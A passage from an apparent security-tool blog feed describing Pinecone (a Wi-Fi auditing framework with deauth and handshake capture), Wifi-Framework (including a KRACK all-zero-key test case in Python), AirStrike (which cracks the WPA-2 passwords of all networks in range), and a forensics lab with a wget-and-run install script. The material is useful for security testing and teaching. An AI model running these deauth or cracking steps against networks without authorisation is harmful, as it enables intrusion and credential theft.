href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe" rel="nofollow" target="_blank" title="compile it from its source code">compile it from its source code</a>.</li> </ul> <p dir="auto">After installing the necessary packages, you can install the Python packages <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for Pinecone using <code>pip3 install -r requirements.txt</code> in the project root folder.</p> <h2 dir="auto">Usage</h2> <p dir="auto">For starting Pinecone, execute <code>python3 pinecone.py</code> from within the project root folder:</p> <div><pre><code>root@kali:~/pinecone# python pinecone.py <br />[i] Database file: ~/pinecone/db/database.sqlite<br />pinecone > <br /></code></pre></div> <p dir="auto">Pinecone is controlled via a Metasploit-like command-line interface. You can type <code>help</code> to get the list of available commands, or <code>help 'command'</code> to get more information about a specific command:</p> <div><pre><code>pinecone > help<br /><br />Documented commands (type help <topic>):<br />========================================<br />alias help load pyscript set shortcuts use<br />edit history py quit shell unalias <br /><br />Undocumented commands:<br />======================<br />back run stop<br /><br />pinecone > help use<br />Usage: use module [-h]<br /><br />Interact with the specified module.<br /><br />positional arguments:<br /> module module ID<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /></code></pre></div> <p dir="auto">Use the command <code>use 'moduleID'</code> to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:</p> <div><pre><code>pinecone > use <br />attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap <br />daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake<br />pinecone > use discovery/recon <br />pcn module(discovery/recon) > <br /></code></pre></div> <p dir="auto">Every module has options, that can be seen typing <code>help run</code> or <code>run --help</code> when a module is activated. Most modules have default values for their options (check them before running):</p> <div><pre><code>pcn module(discovery/recon) > help run<br />usage: run [-h] [-i INTERFACE]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -i INTERFACE, --iface INTERFACE<br /> monitor mode capable WLAN interface (default: wlan0)<br /></code></pre></div> <p dir="auto">When a module is activated, you can use the <code>run [options...]</code> command to start its functionality. The modules provide feedback of their execution state:</p> <div><pre><code>pcn script(attack/wpa_handshake) > run -s TEST_SSID<br />[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...<br />................................................................<br />Sent 64 packets.<br />[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...<br /></code></pre></div> <p dir="auto">If the module runs in background (for example, <em>scripts/infrastructure/ap</em>), you can stop it using the <code>stop</code> command when the module is running:</p> <div>When you are done using a module, you can deactivate it by using the <code>back</code> command. You can also activate another module issuing the <code>use</code> command again. <p dir="auto">Shell commands may be executed with the command <code>shell</code> or the <code>!</code> shortcut:</p> <div><pre><code>pinecone > !ls<br />LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md<br /></code></pre></div> <p dir="auto">Currently, Pinecone <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> SQLite database is stored in the <em>db/</em> directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the <em>tmp/</em> directory also under the project root folder.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/pinecone-wifi/pinecone" rel="nofollow" target="_blank" title="Download Pinecone">Download Pinecone</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-79612526975714349202022-01-12T17:30:00.001-03:002022-01-12T17:30:00.299-03:00Wifi-Framework - Wi-Fi Framework For Creating Proof-Of-Concepts, Automated Experiments, Test Suites, Fuzzers, And More...<p><a href="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/s1600/wifi-framework_1_framework-794677.png" style="text-align: -webkit-center;"><img alt="" border="0" height="270" id="BLOGGER_PHOTO_ID_7051801552786097458" src="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/w640-h270/wifi-framework_1_framework-794677.png" width="640" /></a></p><br /> <p dir="auto">We present a framework to more easily perform Wi-Fi experiments. It can be used to create fuzzers, implement new attacks, create proof-of-concepts to test for vulnerabilities, automate experiments, implement test suites, and so on.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <p dir="auto">The main advantage of the framework is that it <strong>allows you to reuse Wi-Fi functionality of Linux to more easily implement attacks and/or tests</strong>. For instance, the framework can connect to (protected) Wi-Fi networks for you and can broadcast beacons for you when testing clients. In general, any Wi-Fi functionality of Linux can be reused to more quickly implement attacks/tests. The framework accomplishes this by executing <em>test cases</em> on top of the <em>hostap</em> user space daemon.</p> <p align="center" dir="auto"> <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/framework.png" rel="nofollow" target="_blank" title="Wi-Fi Framework for creating proof-of-concepts, automated experiments, test suites, fuzzers, and more. (1)"></a><a href="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/s1600/wifi-framework_1_framework-794677.png"><img alt="" border="0" height="270" id="BLOGGER_PHOTO_ID_7051801552786097458" src="http://3.bp.blogspot.com/-JbphEl6ss_A/Yd0IJnRdBTI/AAAAAAAA7ps/3CRaODzlOvo8YsavwByxazVdIoYJRV2OgCK4BGAYYCw/w640-h270/wifi-framework_1_framework-794677.png" width="640" /></a> <br /> <em>Overview of the Wi-Fi Daemon and Framework components.</em> </p> <p dir="auto">If you are new to performing Wi-Fi experiments on Linux it is highly recommended to first read the <a href="https://github.com/vanhoefm/libwifi/blob/master/docs/linux_tutorial.md" rel="nofollow" target="_blank" title="libwifi Linux Tutorial">libwifi Linux Tutorial</a>. When you are implementing basic Wi-Fi attacks without the need to reuse Linux functionality, then the framework provides limited advantages and you can instead consider directly implementing attacks in Scapy and optionally use the <a href="https://github.com/vanhoefm/libwifi" rel="nofollow" target="_blank" title="libwifi">libwifi</a> library.</p> <h2 dir="auto">Usage</h2> <p dir="auto">To use the framework:</p> <ol dir="auto"> <li> <p dir="auto"><a href="https://github.com/domienschepers/wifi-framework/blob/master/setup" rel="nofollow" target="_blank" title="Install it">Install it</a>.</p> </li> <li> <p dir="auto">Read the <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/USAGE.md" rel="nofollow" target="_blank" title="usage tutorial">usage tutorial</a>.</p> </li> </ol> <p dir="auto"><a id="user-content-id-example" target="_blank" title="Wi-Fi Framework for creating proof-of-concepts, automated experiments, test suites, fuzzers, and more. (6)"></a></p> <h2 dir="auto">Example</h2> <p dir="auto">Say you want to test whether a client ever encrypts frames using an all-zero key. This can happen during a <a href="https://www.krackattacks.com/#demo" rel="nofollow" target="_blank" title="key reinstallation attack">key reinstallation attack</a>. By using the framework you do not need to reimplement all functionality of an access point, but only need to write the following test case:</p> <div class="highlight highlight-source-python position-relative overflow-auto" data-snippet-clipboard-copy-content="class ExampleKrackZerokey(Test): name = "example-krack-zero-key" kind = Test.Authenticator def __init__(self): super().__init__([ # Replay 4-Way <a title=" handshake="" href="https://www.kitploit.com/search/label/Handshake">Handshake Message 3/4. Action( trigger=Trigger.Connected, action=Action.Function ), # Receive all frames and search for one encrypted with an all-zero key. Action( trigger=Trigger.NoTrigger, action=Action.Receive ), # When we receive such a frame, we can terminate the test. Action( trigger=Trigger.Received, action=Action.Terminate ) ]) def resend(self, station): # Resend 4-Way Handshake Message 3/4. station.wpaspy_command("RESEND_M3 " + station.clientmac ) def receive(self, station, frame): if frame[Dot11].addr2 != station.clientmac or not frame.haslayer(Dot11CCMP): return False # Check if CCMP-encrypted frame can be decrypted using an all-zero key plaintext = decrypt_ccmp(frame.getlayer(Dot11), tk=b"\x00"*16) if plaintext is None: return False # We received a valid plaintext frame! log(STATUS,'Client encrypted a frame with an all-zero key!', color="green") return True"><pre><code>class ExampleKrackZerokey(Test):<br /> name = "example-krack-zero-key"<br /> kind = Test.Authenticator<br /><br /> def __init__(self):<br /> super().__init__([<br /> # Replay 4-Way Handshake Message 3/4.<br /> Action( trigger=Trigger.Connected, action=Action.Function ),<br /> # Receive all frames and search for one encrypted with an all-zero key.<br /> Action( trigger=Trigger.NoTrigger, action=Action.Receive ),<br /> # When we receive such a frame, we can terminate the test.<br /> Action( trigger=Trigger.Received, action=Action.Terminate )<br /> ])<br /><br /><br /> def resend(self, station):<br /> # Resend 4-Way Handshake Message 3/4.<br /> station.wpaspy_command("RESEND_M3 " + station.clientmac )<br /><br /><br /> def receive(self, station, frame):<br /> if frame[Dot11].addr2 != station.clientmac or not frame.haslayer(Dot11CCMP):<br /> return False<br /><br /> # Check if CCMP-encrypted frame can be decrypted using an all-zero key<br /> plaintext = decrypt_c cmp(frame.getlayer(Dot11), tk=b"\x00"*16)<br /> if plaintext is None: return False<br /><br /> # We received a valid plaintext frame!<br /> log(STATUS,'Client encrypted a frame with an all-zero key!', color="green")<br /> return True</code></pre></div> <p dir="auto">The above test case will create an access point that clients can connect to. After the client connects, a new 3rd message in the 4-way handshake will be sent to the client. A <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> client will then start using an all-zero <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> key, which the test case automatically detects.</p> <p dir="auto">You can run the above test case using simulated Wi-Fi radios as follows:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="./setup/setup-hwsim.sh 4 source setup/venv/bin/activate ./run.py wlan1 example-krack-zero-key"><pre><code>./setup/setup-hwsim.sh 4<br />source setup/venv/bin/activate<br />./run.py wlan1 example-krack-zero-key<br /></code></pre></div> <p dir="auto">You can connect to the created access point to test it:</p> <div><pre><code>./hostap.py wlan2<br /></code></pre></div> <p dir="auto">By changing the <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/USAGE.md#id-network-configuration" rel="nofollow" target="_blank" title="network configuration">network configuration</a> this AP can easily be configured to use WPA2 or WPA3 and/or can be configured to use enterprise authentication, without making any changes to the test case that we wrote! Additional benifits of using the framework in this example are:</p> <ul dir="auto"> <li>No need to manually broadcast beacons</li> <li>The <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> and association stage is handled by the framework</li> <li>The WPA2 and/or WPA3 handshake is handled by the framework</li> <li>Injected packets will be automatically retransmitted by the Linux kernel</li> <li>Packets sent <em>towards</em> the AP will be acknowledged</li> <li>Sleep mode of the client is automatically handled by the kernel</li> <li>...</li> </ul> <p dir="auto">See <a href="https://github.com/domienschepers/wifi-framework/blob/master/docs/EXAMPLES.md" rel="nofollow" target="_blank" title="a detailed description of all our examples">a detailed description of all our examples</a> for more examples.</p> <h2 dir="auto">Publications</h2> <p dir="auto">This work was published at ACM Conference on Security and Privacy in <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> and Mobile Networks (WiSec '21):</p> <ul dir="auto"> <li><a href="https://dl.acm.org/doi/10.1145/3448300.3468261" rel="nofollow" target="_blank" title="DEMO: A Framework to Test and Fuzz Wi-Fi Devices">DEMO: A Framework to Test and Fuzz Wi-Fi Devices</a></li> </ul> <p dir="auto">Works that have used this framework or a similar one:</p> <ul dir="auto"> <li><a href="https://github.com/vanhoefm/fragattacks" rel="nofollow" target="_blank" title="FragAttacks: Fragmentation & Aggregation Attacks">FragAttacks: Fragmentation & Aggregation Attacks</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/domienschepers/wifi-framework" rel="nofollow" target="_blank" title="Download Wifi-Framework">Download Wifi-Framework</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8236688380809962292021-12-05T08:30:00.005-03:002021-12-05T08:30:00.296-03:00AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed Client-Server Architecture<p align="center" dir="auto"><a href="http://3.bp.blogspot.com/-kuWqdU_8A-g/YZ3S2bha4gI/AAAAAAAA4Mc/c0yX89zqmbsVayuJhY_L07SatqzhXQ_WwCK4BGAYYCw/s1600/AirStrike_1_logo-771856.png"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7034010025565282818" src="http://3.bp.blogspot.com/-kuWqdU_8A-g/YZ3S2bha4gI/AAAAAAAA4Mc/c0yX89zqmbsVayuJhY_L07SatqzhXQ_WwCK4BGAYYCw/w596-h640/AirStrike_1_logo-771856.png" width="596" /></a> </p> <p align="center" dir="auto"> Tool that automates <a href="https://www.kitploit.com/search/label/Cracking" target="_blank" title="cracking">cracking</a> of WPA-2 Wi-Fi <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> using client-server architecture</p><span><a name='more'></a></span><p align="center" dir="auto"><br /></p> <h1 dir="auto">Requirements</h1> <p dir="auto">Airstrike uses Hashcat Brain Architecture, <code>aircrack-ng</code> suite, <code>entr</code> utility and some helper scripts.</p> <p dir="auto">You can use <code>install.sh</code> script to download all dependencies (if you're on system which has an access to apt or pacman, but if you're using Gentoo or Void Linux, you'd have to install hcxtools by hand, they're not available in their repos, or maybe I've missed something. Some other uncommon distros are not included, for example Alpine doesn't have hashcat package, but if you're distro is exotic, you can use Nix on that, all needed packages are in nixpkgs.)</p> <p dir="auto">If you're using Nix/NixOS, you can jump into Nix-Shell with needed dependencies with: <code>nix-shell -p hashcat <a href="https://www.kitploit.com/search/label/Hashcat-Utils" target="_blank" title="hashcat-utils">hashcat-utils</a> <a href="https://www.kitploit.com/search/label/Aircrack-ng" target="_blank" title="aircrack-ng">aircrack-ng</a> entr hcxtools</code></p> <h1 dir="auto">Usage</h1> <p dir="auto">Run <code>aircrack_server.sh</code> on the machine on which you want to crack passwords. This script builds <code>aircrack_client.sh</code> file, which can be executed on any Linux host that is able to connect with the server started earlier. Upon execution, the client automatically captures handshakes, connects with the server and sends captured data.</p> <p dir="auto">Whenever a password is sucessfully cracked by the server, the <code>watcher.sh</code> script prints it out to terminal on the server side.</p> <p dir="auto">The only required option flag for <code>airstrike_client.sh</code> is the <code>-w</code> flag: it specifies the wordlist that should be used by the server. Listening interface can be specified with <code>-i</code> flag. By default, a current wireless interface is automatically selected. Additionally, <code>airstrike_client.sh</code> listens for WPA-2 data without any filter, so it will capture and crack all of the <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> of all Wi-Fi networks in range (whenever handshakes are exchanged).</p> <h1 dir="auto">Navigation</h1> <p dir="auto"><code>Ctrl + S</code> will send capturd assets (Wi-Fi hansdhakes in <code>.hccapx</code> form) to the server. <code>Ctrl + I</code> disaplays information about capture progress.</p> <p dir="auto">Above shortcuts can be used inside a running instance of <code>airstrike_client.sh</code></p> <blockquote> <p dir="auto">made with love by Red Code Labs <*></p></blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcode-labs/AirStrike" rel="nofollow" target="_blank" title="Download AirStrike">Download AirStrike</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77756113575259912652021-11-29T17:30:00.008-03:002021-11-29T17:30:00.275-03:00Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiGH5Xx6KQ8Jd109qlTWqnttbS0LwzBhCMAWLUj8A_4lwSHrfdQM-GXsCtbnn5Ecut728xiAo0GM7Sz3DJTEkZOEkcgaOxXYdrAXPJRuNPz3dHGT8UPCg8znBqqLtNTsi1wVep8Y3LjWN21gAZJSWAebUKgjZ44AEhGIQrRAHJL5wnfcgiv2w7nDhwP5A=s697" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="697" height="81" src="https://blogger.googleusercontent.com/img/a/AVvXsEiGH5Xx6KQ8Jd109qlTWqnttbS0LwzBhCMAWLUj8A_4lwSHrfdQM-GXsCtbnn5Ecut728xiAo0GM7Sz3DJTEkZOEkcgaOxXYdrAXPJRuNPz3dHGT8UPCg8znBqqLtNTsi1wVep8Y3LjWN21gAZJSWAebUKgjZ44AEhGIQrRAHJL5wnfcgiv2w7nDhwP5A=w200-h81" width="200" /></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhdi8i2IeXR7oL4cTPSV4N6B9AzcPuQ8PmPd8WXFYvrqRuT2ohxohzGS0QxO3CYtPxZDPxaue2JpblMMXaE9EwDNUEtlDQhG8OF3ZwOiiO_lA_BdMNMA56EcHgdRDLBtqKJE4esi1ODlpQBsgvCg_subZIO-MA6dOQWx13uIRN0-LuLNf4ZiWpO_D9Fxg=s624" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="624" height="84" src="https://blogger.googleusercontent.com/img/a/AVvXsEhdi8i2IeXR7oL4cTPSV4N6B9AzcPuQ8PmPd8WXFYvrqRuT2ohxohzGS0QxO3CYtPxZDPxaue2JpblMMXaE9EwDNUEtlDQhG8OF3ZwOiiO_lA_BdMNMA56EcHgdRDLBtqKJE4esi1ODlpQBsgvCg_subZIO-MA6dOQWx13uIRN0-LuLNf4ZiWpO_D9Fxg=w200-h84" width="200" /></a></div><p><br /></p> <h3 dir="auto">Features of Repository</h3> <p dir="auto">===================</p> <ul dir="auto"> <li>Hands-on <a href="https://www.kitploit.com/search/label/Digital%20Forensics" target="_blank" title="Digital Forensics">Digital Forensics</a> Labs: designed for Students and Faculty</li> <li>Linux-based lab: All labs are purely based on <a href="https://www.kali.org/downloads/" rel="nofollow" target="_blank" title="Kali Linux">Kali Linux</a></li> <li>Lab screenshots: Each lab has PPTs with instruction screenshots</li> <li>Comprehensive: Cover many topics in digital forensics</li> <li>Free: All tools are open source</li> <li>Updated: The project is funded by DOJ and will keep updating</li> <li>Two formalized forensic intelligence in JSON files based-on case studies</li></ul><span><a name='more'></a></span><div><br /></div> <h2 dir="auto">Table of Contents (updating)</h2> <ul dir="auto"> <li>Basic Computer Skills for Digital Forensics <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx" rel="nofollow" target="_blank" title="Number Systems">Number Systems</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/1_PC_Introduction.pptx" rel="nofollow" target="_blank" title="PC Introduction">PC Introduction</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/2_Win_command_line_tutorial.pptx" rel="nofollow" target="_blank" title="Windows">Windows </a><a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Tutorial</li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/3_Linux_command_line_tutorial.pptx" rel="nofollow" target="_blank" title="Linux Command Line Tutorial">Linux Command Line Tutorial</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/4_Advanced_linux_command_line.pptx" rel="nofollow" target="_blank" title="Advanced Linux Command Line Tutorial">Advanced Linux Command Line Tutorial</a></li> </ul> </li> <li>Computer and Digital Forensics (updated on Oct. 2021) <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/5_Introduction_to_digital_forensics.pptx" rel="nofollow" target="_blank" title="Introduction to Digital Forensics">Introduction to Digital Forensics</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/6_Sleuth_Kit_Tutorial.pptx" rel="nofollow" target="_blank" title="Sleuth Kit Tutorial">Sleuth Kit Tutorial</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/7_USB_Image_Acquisition.pptx" rel="nofollow" target="_blank" title="USB Image Acquisition">USB Image Acquisition</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/8_Evidence_search_techniques.pptx" rel="nofollow" target="_blank" title="Evidence Search Techniques">Evidence Search Techniques</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/9_Data_Carving.pptx" rel="nofollow" target="_blank" title="Data Carving">Data Carving</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/10_Steganography.pptx" rel="nofollow" target="_blank" title="Steganography">Steganography</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/Forensic_Report_Template.pdf" rel="nofollow" target="_blank" title="Forensic Report Template">Forensic Report Template</a></li> </ul> </li> <li>Computer Forensics Case Study <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-P2P-Data-Leakage" rel="nofollow" target="_blank" title="Investigating P2P Data Leakage">Investigating P2P Data Leakage</a> (added on June 2021)</li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-NIST-Data-Leakage" rel="nofollow" target="_blank" title="Investigating NIST Data Leakage">Investigating NIST Data Leakage</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Illegal-Possession-of-Images" rel="nofollow" target="_blank" title="Investigating Illegal Possession of Images">Investigating Illegal Possession of Images</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Email-Harassment" rel="nofollow" target="_blank" title="Investigating Email Harassment">Investigating Email Harassment</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-illegal-File-Transferring" rel="nofollow" target="_blank" title="Investigating Illegal File Transferring (Memory Forensics)">Investigating Illegal File Transferring (Memory Forensics)</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Hacking-Case" rel="nofollow" target="_blank" title="Investigating Hacking Case">Investigating Hacking Case</a></li> </ul> </li> <li>Mobile Forensics Case Study <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Android-10" rel="nofollow" target="_blank" title="Investigating Android 10">Investigating Android 10</a> (added on Oct/24/2021)</li> <li>iOS 13 (to be released...)</li> </ul> </li> <li>Forensic Intelligence Repository <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Email_Harassment" rel="nofollow" target="_blank" title="Email forensics">Email forensics</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Illegal_Possession_Images" rel="nofollow" target="_blank" title="Illegal Possession of Images">Illegal Possession of Images</a></li> </ul> </li> <li>Tool Installation <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Tools-Used" rel="nofollow" target="_blank" title="Tools Used">Tools Used</a></li> <li><a href="https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/Kali_Installation_2020.pptx" rel="nofollow" target="_blank" title="Installation PPTs">Installation PPTs</a></li> <li>Installation Scripts (see commands as follows)</li> </ul> </li> </ul> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon. wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh chmod +x tool-install-zsh.sh ./tool-install-zsh.sh "><pre><code># The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.<br /><br />wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh<br />chmod +x tool-install-zsh.sh<br />./tool-install-zsh.sh</code></pre></div> <h3 dir="auto"><br /></h3><h3 dir="auto">Investigating P2P Data Leakage</h3> <p dir="auto">==============</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case" rel="nofollow" target="_blank" title="P2P data leakage case study">P2P data leakage case study</a> is to help students to apply various forensic techniques to investigate intellectual property theft involving P2P. The study include</p> <ul dir="auto"> <li>A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline.</li> <li>Solid evidence with explanations. Each evidence that is associated with each activity is explained along with the timeline. We suggest using this before study NIST data leakage case study.</li> <li>10 hands-on labs/topics in digital forensics</li> </ul> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID00_Lab_Setup.pptx" rel="nofollow" target="_blank" title="Lab Environment Setting Up">Lab Environment Setting Up</a></td> <td>4M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID01_Disk_Image_and_Partitions.pptx" rel="nofollow" target="_blank" title="Disk Image and Partitions">Disk Image and Partitions</a></td> <td>5M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID02_Registry_and_File_Directory.pptx" rel="nofollow" target="_blank" title="Windows Registry and File Directory">Windows Registry and File Directory</a></td> <td>15M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx" rel="nofollow" target="_blank" title="MFT Timeline">MFT Timeline </a></td> <td>6M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx" rel="nofollow" target="_blank" title="USN Journal Timeline">USN Journal Timeline</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID05_uTorrent_Log_File.pptx" rel="nofollow" target="_blank" title="uTorrent Log File">uTorrent Log File </a></td> <td>9M</td> </tr> <tr> <td>Lab 6</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID06_File_Signature.pptx" rel="nofollow" target="_blank" title="File Signature">File Signature </a></td> <td>8M</td> </tr> <tr> <td>Lab 7</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID07_Emails.pptx" rel="nofollow" target="_blank" title="Emails">Emails </a></td> <td>9M</td> </tr> <tr> <td>Lab 8</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID08_Web_History.pptx" rel="nofollow" target="_blank" title="Web History">Web History </a></td> <td>11M</td> </tr> <tr> <td>Lab 9</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID09_Website_Analysis.pptx" rel="nofollow" target="_blank" title="Website Analysis">Website Analysis </a></td> <td>2M</td> </tr> <tr> <td>Lab 10</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/Questions.docx" rel="nofollow" target="_blank" title="Timeline (Summary)">Timeline (Summary)</a></td> <td>13K</td> </tr> </tbody></table><br /> <h3 dir="auto">Investigating NIST Data Leakage</h3> <p dir="auto">==============</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate an image involving intellectual property theft. The study include</p> <ul dir="auto"> <li>A large and complex case study created by NIST. You can access the <a href="https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html" rel="nofollow" target="_blank" title="Senario, DD/Encase images">Senario, DD/Encase images</a>. You can also find the <a href="https://www.cfreds.nist.gov/data_leakage_case/leakage-answers.pdf" rel="nofollow" target="_blank" title="solutions">solutions</a> on their website.</li> <li>14 hands-on labs/topics in digital forensics</li> </ul> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_00_Env_Setting.pptx" rel="nofollow" target="_blank" title="Environment Setting Up">Environment Setting Up</a></td> <td>2M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_01_Registry.pptx" rel="nofollow" target="_blank" title="Windows Registry">Windows Registry</a></td> <td>3M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx" rel="nofollow" target="_blank" title="Windows Event and XML">Windows Event and XML</a></td> <td>3M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx" rel="nofollow" target="_blank" title="Web History and SQL">Web History and SQL</a></td> <td>3M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx" rel="nofollow" target="_blank" title="Email Investigation">Email Investigation</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a 